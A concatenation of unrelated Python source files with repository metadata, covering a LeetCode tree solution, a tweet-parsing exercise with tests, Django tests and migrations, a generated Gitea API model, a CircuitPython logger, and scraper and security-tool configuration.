| 9
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,707
|
py
|
"""
Given a non-empty binary tree, find the maximum path sum.
For this problem, a path is defined as any sequence of nodes from some starting node to any node in the tree along the parent-child connections. The path must contain at least one node and does not need to go through the root.
Example 1:
Input: [1,2,3]
1
/ \
2 3
Output: 6
Example 2:
Input: [-10,9,20,null,null,15,7]
-10
/ \
9 20
/ \
15 7
Output: 42
Similar to Problem 687
https://leetcode.com/problems/binary-tree-maximum-path-sum/discuss/171807/Python-or-DFS-tm
Algorithm
分制到底部,在返回的时候传入左右任意一遍最大值加上目前root.val:
cur = max(left, right) + root.val
这种情况处理了从Root到左右任意一边的最大值,也就是 root.val + left 和 root.val + right
还有一种情况就是当最大值 = root.val + left + right, 我们在放入global变量的时候何其比较。
对于最底部叶子节点传上来的值,我们将其设置成0: return cur if cur > 0 else 0
Now everything is ready to write down an algorithm.
1. Initiate max_sum as the smallest possible integer and call max_gain(node = root).
2. Implement max_gain(node) with a check to continue the old path/to start a new path:
- Base case : if node is null, the max gain is 0.
- Call max_gain recursively for the node children to compute max gain from the left and right subtrees : left_gain = max(max_gain(node.left), 0) and
right_gain = max(max_gain(node.right), 0).
- Now check to continue the old path or to start a new path. To start a new path would cost price_newpath = node.val + left_gain + right_gain. Update max_sum if it's better to start a new path.
- For the recursion return the max gain the node and one/zero of its subtrees could add to the current path : node.val + max(left_gain, right_gain).
Bottom up divider and conquer
At each rode, it can form 3 tyes of path.
1st is node
2nd is left - node - right
3rd is left/right - node
Once we get the max after comparsion, we return 1st or 3rd path sum to the upper level.
"""
class TreeNode:
    """Plain binary-tree node: a value plus optional left/right children."""
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None


class Solution:
    def maxPathSum(self, root: TreeNode) -> int:
        """Return the maximum sum over all connected paths in the tree.

        A path may start and end at any nodes along parent-child links and
        must contain at least one node. Returns None for an empty tree
        (preserving the original contract).
        """
        if not root:
            return
        self.res = float('-inf')
        self.helper(root)
        return self.res

    def helper(self, root):
        """Post-order pass: record the best "arch" through each node in
        self.res and return the best single-branch gain ending at the node."""
        if root is None:
            return 0
        gain_left = self.helper(root.left)
        gain_right = self.helper(root.right)
        # Negative branches contribute nothing — drop them.
        if gain_left < 0:
            gain_left = 0
        if gain_right < 0:
            gain_right = 0
        # Best path bending through this node (left - node - right).
        arch = root.val + gain_left + gain_right
        if arch > self.res:
            self.res = arch
        # Only one branch may continue upward to the parent.
        better_branch = gain_left if gain_left > gain_right else gain_right
        return root.val + better_branch
|
[
"taocheng984@gmail.com"
] |
taocheng984@gmail.com
|
010427dfae0fe07018165b13f4ff05de9eb8ea7c
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/galex_j19059-4438/sdB_galex_j19059-4438_coadd.py
|
21693045bdacdeb4c6ec6e927c32a01761f2fbab
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496
| 2016-08-08T16:49:53
| 2016-08-08T16:49:53
| 65,221,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 455
|
py
|
from gPhoton.gMap import gMap
def main():
    # One-shot gPhoton extraction for sdB_galex_j19059-4438: NUV band, fixed
    # sky position and 2-arcmin box, 30-second time steps.
    # NOTE(review): cntfile lives under .../LIGHTCURVES/sdBs/... while
    # cntcoaddfile is under .../LIGHTCURVES/sdB/... — confirm the differing
    # directories are intentional.
    gMap(band="NUV", skypos=[286.482375,-44.643983], skyrange=[0.0333333333333,0.0333333333333], stepsz = 30., cntfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdBs/sdB_galex_j19059-4438/sdB_galex_j19059-4438_movie_count.fits", cntcoaddfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdB/sdB_galex_j19059-4438/sdB_galex_j19059-4438_count_coadd.fits", overwrite=True, verbose=3)

if __name__ == "__main__":
    main()
|
[
"thomas@boudreauxmail.com"
] |
thomas@boudreauxmail.com
|
2dd11b0a111f15630d14d50fd54317a69dd5160c
|
99c4d4a6592fded0e8e59652484ab226ac0bd38c
|
/code/batch-1/dn5/M-69.py
|
5f487e7ea6ba72a5ea5819aa9b5f57e667ecd5d4
|
[] |
no_license
|
benquick123/code-profiling
|
23e9aa5aecb91753e2f1fecdc3f6d62049a990d5
|
0d496d649247776d121683d10019ec2a7cba574c
|
refs/heads/master
| 2021-10-08T02:53:50.107036
| 2018-12-06T22:56:38
| 2018-12-06T22:56:38
| 126,011,752
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,698
|
py
|
import unittest
def unikati(s):
    """Return the unique elements of s, preserving first-appearance order.

    IDIOM FIX: the original called `list.__contains__` directly; the `in`
    operator is the idiomatic equivalent. List membership is kept (rather
    than a set) so unhashable elements keep working.
    """
    videni = []
    for element in s:
        if element not in videni:
            videni.append(element)
    return videni
def avtor(tvit):
ime = ""
for currChar in tvit:
if currChar != ':':
ime += currChar
else:
break
return ime
def vsi_avtorji(tviti):
    """Return the unique tweet authors, in order of first appearance."""
    avtorji = []
    for tvit in tviti:
        avtorji.append(avtor(tvit))
    return unikati(avtorji)
def izloci_besedo(beseda):
    """Strip non-alphanumeric characters from both ends of beseda.

    Interior punctuation is preserved; an all-punctuation word becomes "".
    """
    zacetek = 0
    konec = len(beseda)
    # Advance past leading non-alphanumerics.
    while zacetek < konec and not beseda[zacetek].isalnum():
        zacetek += 1
    # Retreat past trailing non-alphanumerics.
    while konec > zacetek and not beseda[konec - 1].isalnum():
        konec -= 1
    return beseda[zacetek:konec]
def se_zacne_z(tvit, c):
besede = []
for currBeseda in tvit.split():
if(currBeseda[0] == c):
besede.append(izloci_besedo(currBeseda))
return besede
def zberi_se_zacne_z(tviti, c):
besede = []
for tvit in tviti:
besede.extend(se_zacne_z(tvit, c))
return unikati(besede)
def vse_afne(tviti):
return zberi_se_zacne_z(tviti, '@')
def vsi_hashtagi(tviti):
return zberi_se_zacne_z(tviti, '#')
def vse_osebe(tviti):
osebe = []
for tvit in tviti:
osebe.append(avtor(tvit))
osebe.extend(vse_afne(tviti))
osebe.sort()
return unikati(osebe)
def custva(tviti, hashtagi):
osebe = []
for tvit in tviti:
for hashtag in hashtagi:
if tvit.__contains__(hashtag):
osebe.append(avtor(tvit))
osebe.sort()
return unikati(osebe)
def se_poznata(tviti, oseba1, oseba2):
for tvit in tviti:
if (se_zacne_z(tvit, '@').__contains__(oseba1) and avtor(tvit) == oseba2) or (se_zacne_z(tvit, '@').__contains__(oseba2) and avtor(tvit) == oseba1):
return True
return False
class TestTviti(unittest.TestCase):
tviti = [
"sandra: Spet ta dež. #dougcajt",
"berta: @sandra Delaj domačo za #programiranje1",
"sandra: @berta Ne maram #programiranje1 #krneki",
"ana: kdo so te @berta, @cilka, @dani? #krneki",
"cilka: jst sm pa #luft",
"benjamin: pogrešam ano #zalosten",
"ema: @benjamin @ana #split? po dvopičju, za začetek?",
]
def test_unikat(self):
self.assertEqual(unikati([1, 2, 1, 1, 3, 2]), [1, 2, 3])
self.assertEqual(unikati([1, 3, 2, 1, 1, 3, 2]), [1, 3, 2])
self.assertEqual(unikati([1, 5, 4, 3, 2]), [1, 5, 4, 3, 2])
self.assertEqual(unikati([1, 1, 1, 1, 1]), [1])
self.assertEqual(unikati([1]), [1])
self.assertEqual(unikati([]), [])
self.assertEqual(unikati(["Ana", "Berta", "Cilka", "Berta"]), ["Ana", "Berta", "Cilka"])
def test_avtor(self):
self.assertEqual(avtor("janez: pred dvopičjem avtor, potem besedilo"), "janez")
self.assertEqual(avtor("ana: malo krajse ime"), "ana")
self.assertEqual(avtor("benjamin: pomembne so tri stvari: prva, druga in tretja"), "benjamin")
def test_vsi_avtorji(self):
self.assertEqual(vsi_avtorji(self.tviti), ["sandra", "berta", "ana", "cilka", "benjamin", "ema"])
self.assertEqual(vsi_avtorji(self.tviti[:3]), ["sandra", "berta"])
def test_izloci_besedo(self):
self.assertEqual(izloci_besedo("@ana"), "ana")
self.assertEqual(izloci_besedo("@@ana!!!"), "ana")
self.assertEqual(izloci_besedo("ana"), "ana")
self.assertEqual(izloci_besedo("!#$%\"=%/%()/Ben-jamin'"), "Ben-jamin")
def test_vse_na_crko(self):
self.assertEqual(se_zacne_z("Benjamin $je $skocil! Visoko!", "$"), ["je", "skocil"])
self.assertEqual(se_zacne_z("Benjamin $je $skocil! #Visoko!", "$"), ["je", "skocil"])
self.assertEqual(se_zacne_z("ana: kdo so te @berta, @cilka, @dani? #krneki", "@"), ["berta", "cilka", "dani"])
def test_zberi_na_crko(self):
self.assertEqual(zberi_se_zacne_z(self.tviti, "@"), ['sandra', 'berta', 'cilka', 'dani', 'benjamin', 'ana'])
self.assertEqual(zberi_se_zacne_z(self.tviti, "#"), ['dougcajt', 'programiranje1', 'krneki', 'luft', 'zalosten', 'split'])
def test_vse_afne(self):
self.assertEqual(vse_afne(self.tviti), ['sandra', 'berta', 'cilka', 'dani', 'benjamin', 'ana'])
def test_vsi_hashtagi(self):
self.assertEqual(vsi_hashtagi(self.tviti), ['dougcajt', 'programiranje1', 'krneki', 'luft', 'zalosten', 'split'])
def test_vse_osebe(self):
self.assertEqual(vse_osebe(self.tviti), ['ana', 'benjamin', 'berta', 'cilka', 'dani', 'ema', 'sandra'])
class TestDodatna(unittest.TestCase):
tviti = [
"sandra: Spet ta dež. #dougcajt",
"berta: @sandra Delaj domačo za #programiranje1",
"sandra: @berta Ne maram #programiranje1 #krneki",
"ana: kdo so te @berta, @cilka, @dani? #krneki",
"cilka: jst sm pa #luft",
"benjamin: pogrešam ano #zalosten",
"ema: @benjamin @ana #split? po dvopičju, za začetek?",
]
def test_custva(self):
self.assertEqual(custva(self.tviti, ["dougcajt", "krneki"]), ["ana", "sandra"])
self.assertEqual(custva(self.tviti, ["luft"]), ["cilka"])
self.assertEqual(custva(self.tviti, ["meh"]), [])
def test_se_poznata(self):
self.assertTrue(se_poznata(self.tviti, "ana", "berta"))
self.assertTrue(se_poznata(self.tviti, "ema", "ana"))
self.assertFalse(se_poznata(self.tviti, "sandra", "ana"))
self.assertFalse(se_poznata(self.tviti, "cilka", "luft"))
self.assertFalse(se_poznata(self.tviti, "cilka", "balon"))
if __name__ == "__main__":
unittest.main()
|
[
"benjamin.fele@gmail.com"
] |
benjamin.fele@gmail.com
|
5180350f76117971d49278960829f3e352d29cdc
|
79c2fe6cc0af8c9267901d891b85e226d4b6bc51
|
/pontoon/base/tests/test_models.py
|
4fc934d4f2c75d624a3863fa9c7ab422901d7b78
|
[
"BSD-3-Clause"
] |
permissive
|
SandraShklyaeva/pontoon
|
d1f1eab458bbab75e54b112e60d077d34b27699f
|
577a3275a0cf4888ecc30622ba4449fe706d5fd6
|
refs/heads/master
| 2021-01-14T12:36:21.461908
| 2015-09-16T08:33:11
| 2015-09-16T08:33:11
| 31,669,331
| 0
| 0
| null | 2015-03-26T06:12:32
| 2015-03-04T17:14:22
|
Python
|
UTF-8
|
Python
| false
| false
| 1,916
|
py
|
from django_nose.tools import assert_equal
from pontoon.base.models import Translation
from pontoon.base.tests import (
TranslationFactory,
UserFactory,
TestCase
)
from pontoon.base.utils import aware_datetime
class TranslationQuerySetTests(TestCase):
def setUp(self):
self.user0, self.user1 = UserFactory.create_batch(2)
def _translation(self, user, submitted, approved):
return TranslationFactory.create(
date=aware_datetime(*submitted),
user=user,
approved_date=aware_datetime(*approved) if approved else None,
approved_user=user
)
def test_latest_activity_translated(self):
"""
If latest activity in Translation QuerySet is translation submission,
return submission date and user.
"""
latest_submission = self._translation(self.user0, submitted=(1970, 1, 3), approved=None)
latest_approval = self._translation(self.user1, submitted=(1970, 1, 1), approved=(1970, 1, 2))
assert_equal(Translation.objects.all().latest_activity(), {
'date': latest_submission.date,
'user': latest_submission.user
})
def test_latest_activity_approved(self):
"""
If latest activity in Translation QuerySet is translation approval,
return approval date and user.
"""
latest_submission = self._translation(self.user0, submitted=(1970, 1, 2), approved=(1970, 1, 2))
latest_approval = self._translation(self.user1, submitted=(1970, 1, 1), approved=(1970, 1, 3))
assert_equal(Translation.objects.all().latest_activity(), {
'date': latest_approval.date,
'user': latest_approval.user
})
def test_latest_activity_none(self):
"""If empty Translation QuerySet, return None."""
assert_equal(Translation.objects.none().latest_activity(), None)
|
[
"matjaz.horvat@gmail.com"
] |
matjaz.horvat@gmail.com
|
375a11d1c77c7c9b5e0a4ecfe2d2dece4756c57a
|
9878df8dcc9443267197e31f24a628e115c87949
|
/swagger_client/models/create_org_option.py
|
fa8e956d06cf5b747f1f317a21355174bd33dc79
|
[] |
no_license
|
mirandacong/gitea_python_client
|
79fff8b3bb73f160abb059fe2f470b185017e844
|
79e2ae5253a20635aa019e176c17f8797d418f01
|
refs/heads/master
| 2020-04-02T00:19:07.392521
| 2018-10-20T05:02:55
| 2018-10-20T05:02:55
| 153,798,708
| 0
| 0
| null | 2018-10-20T05:02:56
| 2018-10-19T14:49:15
|
Python
|
UTF-8
|
Python
| false
| false
| 5,763
|
py
|
# coding: utf-8
"""
Gitea API.
This documentation describes the Gitea API. # noqa: E501
OpenAPI spec version: 1.1.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class CreateOrgOption(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'description': 'str',
'full_name': 'str',
'location': 'str',
'username': 'str',
'website': 'str'
}
attribute_map = {
'description': 'description',
'full_name': 'full_name',
'location': 'location',
'username': 'username',
'website': 'website'
}
def __init__(self, description=None, full_name=None, location=None, username=None, website=None): # noqa: E501
"""CreateOrgOption - a model defined in Swagger""" # noqa: E501
self._description = None
self._full_name = None
self._location = None
self._username = None
self._website = None
self.discriminator = None
if description is not None:
self.description = description
if full_name is not None:
self.full_name = full_name
if location is not None:
self.location = location
self.username = username
if website is not None:
self.website = website
@property
def description(self):
"""Gets the description of this CreateOrgOption. # noqa: E501
:return: The description of this CreateOrgOption. # noqa: E501
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this CreateOrgOption.
:param description: The description of this CreateOrgOption. # noqa: E501
:type: str
"""
self._description = description
@property
def full_name(self):
"""Gets the full_name of this CreateOrgOption. # noqa: E501
:return: The full_name of this CreateOrgOption. # noqa: E501
:rtype: str
"""
return self._full_name
@full_name.setter
def full_name(self, full_name):
"""Sets the full_name of this CreateOrgOption.
:param full_name: The full_name of this CreateOrgOption. # noqa: E501
:type: str
"""
self._full_name = full_name
@property
def location(self):
"""Gets the location of this CreateOrgOption. # noqa: E501
:return: The location of this CreateOrgOption. # noqa: E501
:rtype: str
"""
return self._location
@location.setter
def location(self, location):
"""Sets the location of this CreateOrgOption.
:param location: The location of this CreateOrgOption. # noqa: E501
:type: str
"""
self._location = location
@property
def username(self):
"""Gets the username of this CreateOrgOption. # noqa: E501
:return: The username of this CreateOrgOption. # noqa: E501
:rtype: str
"""
return self._username
@username.setter
def username(self, username):
"""Sets the username of this CreateOrgOption.
:param username: The username of this CreateOrgOption. # noqa: E501
:type: str
"""
if username is None:
raise ValueError("Invalid value for `username`, must not be `None`") # noqa: E501
self._username = username
@property
def website(self):
"""Gets the website of this CreateOrgOption. # noqa: E501
:return: The website of this CreateOrgOption. # noqa: E501
:rtype: str
"""
return self._website
@website.setter
def website(self, website):
"""Sets the website of this CreateOrgOption.
:param website: The website of this CreateOrgOption. # noqa: E501
:type: str
"""
self._website = website
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CreateOrgOption):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"qzmfranklin@gmail.com"
] |
qzmfranklin@gmail.com
|
0c543552664fd3afe39399fb3f895ca72021e56d
|
bc6508a1dde1e61a8b2f61e70044c074aeeb4406
|
/whoiser/servers/BB.py
|
b33a96c32341105b898e149e693478ed66fbf271
|
[] |
no_license
|
krikulis/whoiser
|
7eca72260dc061a91c7630901557264b80c5263e
|
27af46d6ffcf2bacc5e5b837883ab5fab7ac9b40
|
refs/heads/master
| 2021-01-10T19:10:53.915622
| 2012-06-24T23:50:28
| 2012-06-24T23:50:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 187
|
py
|
from servers.generic import GenericWhoisQuery
class WhoisQuery(GenericWhoisQuery):
def query(self, query):
raise NotImplementedError(u"TLD BB has no Whois server available")
|
[
"kristaps.kulis@gmail.com"
] |
kristaps.kulis@gmail.com
|
2b102cafd639c68ae78c3d889a58a70e39bcd682
|
285de86d006f3ef53b94156d7fcbddb498f10a60
|
/backend/users/migrations/0002_auto_20201125_0526.py
|
d21f4d5402f99799cba6e502d6e82dd81cb1bcc6
|
[] |
no_license
|
crowdbotics-apps/aia-store-22965
|
1e457444cd854adfb35e59edff4ab1f06b8c13b7
|
28162af82dc569d4f4e9a12a14d41787cb1f1a72
|
refs/heads/master
| 2023-01-19T09:18:50.195872
| 2020-11-25T05:27:32
| 2020-11-25T05:27:32
| 315,837,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 627
|
py
|
# Generated by Django 2.2.17 on 2020-11-25 05:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('course', '0001_initial'),
('users', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='user',
name='group',
field=models.ManyToManyField(blank=True, related_name='user_group', to='course.Group'),
),
migrations.AlterField(
model_name='user',
name='name',
field=models.CharField(blank=True, max_length=255, null=True),
),
]
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
3c90e8613ee6cecb065601ac20d4e343478c900d
|
b6aa9768dbac327943e0220df1c56ce38adc6de1
|
/657_robot-return-to-origin.py
|
56b67347d37bd1865161ddde5c165b4adcf916f8
|
[] |
no_license
|
Khrystynka/LeetCodeProblems
|
f86e4c1e46f70f874924de137ec5efb2f2518766
|
917bd000c2a055dfa2633440a61ca4ae2b665fe3
|
refs/heads/master
| 2021-03-17T00:51:10.102494
| 2020-09-28T06:31:03
| 2020-09-28T06:31:03
| 246,954,162
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 476
|
py
|
# Problem Title: Robot Return to Origin
class Solution(object):
def judgeCircle(self, moves):
"""
:type moves: str
:rtype: bool
"""
pos = [0, 0]
for move in moves:
if move == "L":
pos[0] -= 1
elif move == "R":
pos[0] += 1
elif move == "U":
pos[1] += 1
elif move == "D":
pos[1] -= 1
return pos == [0, 0]
|
[
"khrystyna@Khrystynas-MacBook-Pro.local"
] |
khrystyna@Khrystynas-MacBook-Pro.local
|
855af8ae5099cd64f0c255047fc3c691da29855d
|
29a78032c3b2fdd4722f6c054ab20a5a8cea627c
|
/board/user_manager/urls.py
|
0d466d9611d59ef7cd61565d71636d4999a3960e
|
[] |
no_license
|
jungting20/pythonpro
|
838ea188f846b6e1a90f1a7c429f02464b1b0927
|
455dd23132023cb472bab5e8d9ba4a881331db54
|
refs/heads/master
| 2021-06-27T16:20:54.768172
| 2017-09-16T08:38:19
| 2017-09-16T08:38:19
| 103,737,995
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 352
|
py
|
from django.conf.urls import url
from user_manager.views import login, login_validate, join_page
#사실 이자리에 함수가 생기는데 이걸 블록 지정한다음 alt shift v를
#이용하여 views.py로 옮겼다
urlpatterns = [
url(r'^login/$', login),
url(r'^login/validate/$', login_validate),
url(r'^join/$', join_page)
]
|
[
"jungting20@gmail.com"
] |
jungting20@gmail.com
|
8e53c8d3b292b9d2807cb3998f91fe0c511c0f5a
|
c9500ad778b8521aaa85cb7fe3239989efaa4799
|
/plugins/rapid7_insightidr/komand_rapid7_insightidr/actions/update_investigation/schema.py
|
e6b2c8a39c249b0cb740677586dc4812051c1fcc
|
[
"MIT"
] |
permissive
|
rapid7/insightconnect-plugins
|
5a6465e720f114d71b1a82fe14e42e94db104a0b
|
718d15ca36c57231bb89df0aebc53d0210db400c
|
refs/heads/master
| 2023-09-01T09:21:27.143980
| 2023-08-31T10:25:36
| 2023-08-31T10:25:36
| 190,435,635
| 61
| 60
|
MIT
| 2023-09-14T08:47:37
| 2019-06-05T17:05:12
|
Python
|
UTF-8
|
Python
| false
| false
| 6,172
|
py
|
# GENERATED BY KOMAND SDK - DO NOT EDIT
import insightconnect_plugin_runtime
import json
class Component:
DESCRIPTION = "Allows to update existing investigation by ID or RRN"
class Input:
DISPOSITION = "disposition"
EMAIL = "email"
ID = "id"
PRIORITY = "priority"
STATUS = "status"
TITLE = "title"
class Output:
INVESTIGATION = "investigation"
class UpdateInvestigationInput(insightconnect_plugin_runtime.Input):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"disposition": {
"type": "string",
"title": "Disposition",
"description": "Investigation's disposition",
"enum": [
"",
"BENIGN",
"MALICIOUS",
"NOT_APPLICABLE"
],
"order": 5
},
"email": {
"type": "string",
"title": "Email",
"description": "A user's email address for investigation to be assigned",
"order": 6
},
"id": {
"type": "string",
"title": "ID or RRN",
"description": "The identifier of investigation to be update (ID or RRN)",
"order": 1
},
"priority": {
"type": "string",
"title": "Priority",
"description": "Investigation's priority",
"enum": [
"",
"UNSPECIFIED",
"LOW",
"MEDIUM",
"HIGH",
"CRITICAL"
],
"order": 4
},
"status": {
"type": "string",
"title": "Status",
"description": "Investigation's status",
"enum": [
"",
"OPEN",
"INVESTIGATING",
"CLOSED"
],
"order": 3
},
"title": {
"type": "string",
"title": "Title",
"description": "Investigation's title",
"order": 2
}
},
"required": [
"id"
]
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
class UpdateInvestigationOutput(insightconnect_plugin_runtime.Output):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"investigation": {
"$ref": "#/definitions/investigation",
"title": "Investigation",
"description": "The body of the specified investigation",
"order": 1
}
},
"required": [
"investigation"
],
"definitions": {
"assignee": {
"type": "object",
"title": "assignee",
"properties": {
"email": {
"type": "string",
"title": "Email",
"description": "The email of the assigned user",
"order": 1
},
"name": {
"type": "string",
"title": "Name",
"description": "The name of the assigned user",
"order": 2
}
}
},
"investigation": {
"type": "object",
"title": "investigation",
"properties": {
"assignee": {
"$ref": "#/definitions/assignee",
"title": "Assignee",
"description": "The user assigned to this investigation, if any",
"order": 1
},
"created_time": {
"type": "string",
"title": "Created Time",
"description": "The time the investigation was created as an ISO formatted timestamp",
"order": 2
},
"disposition": {
"type": "string",
"title": "Disposition",
"description": "The disposition of this investigation, where possible values are BENIGN, MALICIOUS, NOT_APPLICABLE, and UNSPECIFIED",
"order": 3
},
"first_alert_time": {
"type": "string",
"title": "First Alert Time",
"description": "The create time of the first alert belonging to this investigation",
"order": 4
},
"last_accessed": {
"type": "string",
"title": "Last Accessed",
"description": "The time investigation was last viewed or modified",
"order": 5
},
"latest_alert_time": {
"type": "string",
"title": "Latest Alert Time",
"description": "The create time of the most recent alert belonging to this investigation",
"order": 6
},
"organization_id": {
"type": "string",
"title": "Organization ID",
"description": "The id of the organization that owns this investigation",
"order": 7
},
"priority": {
"type": "string",
"title": "Priority",
"description": "The investigations priority, where possible values are CRITICAL, HIGH, MEDIUM, LOW, and UNKNOWN",
"order": 8
},
"rrn": {
"type": "string",
"title": "RRN",
"description": "The RRN of the investigation",
"order": 9
},
"source": {
"type": "string",
"title": "Source",
"description": "The source of this investigation",
"order": 10
},
"status": {
"type": "string",
"title": "Status",
"description": "The status of the investigation",
"order": 11
},
"title": {
"type": "string",
"title": "Title",
"description": "Investigation title",
"order": 12
}
},
"required": [
"created_time",
"disposition",
"last_accessed",
"organization_id",
"priority",
"rrn",
"source",
"status",
"title"
],
"definitions": {
"assignee": {
"type": "object",
"title": "assignee",
"properties": {
"email": {
"type": "string",
"title": "Email",
"description": "The email of the assigned user",
"order": 1
},
"name": {
"type": "string",
"title": "Name",
"description": "The name of the assigned user",
"order": 2
}
}
}
}
}
}
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
|
[
"noreply@github.com"
] |
rapid7.noreply@github.com
|
eb56d0121a289f5fa16456acf5a76c39e991c74b
|
47128c6ff1277eedf851670d33f7a288fdfe2246
|
/function/function_callback2.py
|
32ed7de75eaffb118c21f481c714ce8fb6757336
|
[] |
no_license
|
chati757/python-learning-space
|
5de7f11a931cf95bc076473da543331b773c07fb
|
bc33749254d12a47523007fa9a32668b8dc12a24
|
refs/heads/master
| 2023-08-13T19:19:52.271788
| 2023-07-26T14:09:58
| 2023-07-26T14:09:58
| 83,208,590
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 552
|
py
|
#!/usr/bin/env python
from __future__ import print_function
def fibonacci(cb):
values = []
while(True):
if len(values) < 2:
values.append(1)
else:
values = [values[-1], values[-1] + values[-2]]
r = cb(values[-1])
if (r[0]):
return(r[1])
def check_17(v):
if v % 17 == 0:
return (True, v)
if v > 10000:
return (True, None)
return (False,)
if __name__ == '__main__':
res = fibonacci(check_17)
if (res != None):
print(res)
|
[
"chati757@users.noreply.github.com"
] |
chati757@users.noreply.github.com
|
5f9fb75b20926dfae9b4822da73744706878fe88
|
4f0cd2618cd7856e5ef51d1ad177fa572ccaea6b
|
/CircuitPython_Templates/storage_neopixel_code/code.py
|
a7c727c5021e3e139f92b578e5c700017f5e6a04
|
[
"MIT"
] |
permissive
|
profharris/Adafruit_Learning_System_Guides
|
ecd213d34ffb7fa227e085ef3c763c802406d30e
|
1e64c043be80451443fcae3f8952c6fd0cb1a52e
|
refs/heads/main
| 2023-07-06T22:17:02.568765
| 2021-08-06T18:44:30
| 2021-08-06T18:44:30
| 394,449,146
| 1
| 0
|
MIT
| 2021-08-09T21:54:29
| 2021-08-09T21:54:28
| null |
UTF-8
|
Python
| false
| false
| 1,439
|
py
|
"""
CircuitPython Essentials Storage CP Filesystem code.py file
For use with boards that have a built-in NeoPixel or NeoPixels, but no little red LED.
It will use only one pixel as an indicator, even if there is more than one NeoPixel.
"""
import time
import board
import microcontroller
import neopixel
pixel = neopixel.NeoPixel(board.NEOPIXEL, 1)
try:
with open("/temperature.txt", "a") as temp_log:
while True:
# The microcontroller temperature in Celsius. Include the
# math to do the C to F conversion here, if desired.
temperature = microcontroller.cpu.temperature
# Write the temperature to the temperature.txt file every 10 seconds.
temp_log.write('{0:.2f}\n'.format(temperature))
temp_log.flush()
# Blink the NeoPixel on every write...
pixel.fill((255, 0, 0))
time.sleep(1) # ...for one second.
pixel.fill((0, 0, 0)) # Then turn it off...
time.sleep(9) # ...for the other 9 seconds.
except OSError as e: # When the filesystem is NOT writable by CircuitPython...
delay = 0.5 # ...blink the NeoPixel every half second.
if e.args[0] == 28: # If the file system is full...
delay = 0.15 # ...blink the NeoPixel every 0.15 seconds!
while True:
pixel.fill((255, 0, 0))
time.sleep(delay)
pixel.fill((0, 0, 0))
time.sleep(delay)
|
[
"kattni@adafruit.com"
] |
kattni@adafruit.com
|
9de73ca502dfd47d31b65500e037cbf5e1d5abde
|
68d38b305b81e0216fa9f6769fe47e34784c77f2
|
/alascrapy/spiders/amazon_it_csv.py
|
f2a5930639aa4176890b9ef1d5c13a6528aae1f8
|
[] |
no_license
|
ADJet1437/ScrapyProject
|
2a6ed472c7c331e31eaecff26f9b38b283ffe9c2
|
db52844411f6dac1e8bd113cc32a814bd2ea3632
|
refs/heads/master
| 2022-11-10T05:02:54.871344
| 2020-02-06T08:01:17
| 2020-02-06T08:01:17
| 237,448,562
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 723
|
py
|
# -*- coding: utf8 -*-
__author__ = 'leonardo'
from alascrapy.spiders.base_spiders.amazon import AmazonCSV
class AmazonITCsv(AmazonCSV):
name = 'amazon_it_csv'
country_code = 'it'
asin_kind = 'amazon_it_id'
endpoint = "webservices.amazon.it"
start_urls = ['http://alatest.com']
schema = {'asin': 0,
'name': 4,
'image': [5, 6, 7],
'url': [23, 28],
'manufacturer': 1,
'price': [19, 24],
'mpn': 17,
'ean': 9,
'salesrank': 12,
'nodes': [{'node': 13,
'node_path': 15},
{'node': 14,
'node_path': 16}]}
|
[
"liangzijie1437@gmail.com"
] |
liangzijie1437@gmail.com
|
3259148744fc149b8b65f565643198102619c09e
|
501615c82801733e69c7447ab9fd68d3883ed947
|
/hotfix/.svn/pristine/32/3259148744fc149b8b65f565643198102619c09e.svn-base
|
d6cfb334426ef58e6247a4decc8bdf34ec7beb71
|
[] |
no_license
|
az0ne/python
|
b2e1cc1e925d1fcdb269e7dd4c48e24665deeeee
|
aec5d23bb412f7dfca374fb5c5b9988c1b817347
|
refs/heads/master
| 2021-07-18T02:08:46.314972
| 2017-10-27T06:23:36
| 2017-10-27T06:23:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 768
|
# -*- coding: utf-8 -*-
"""
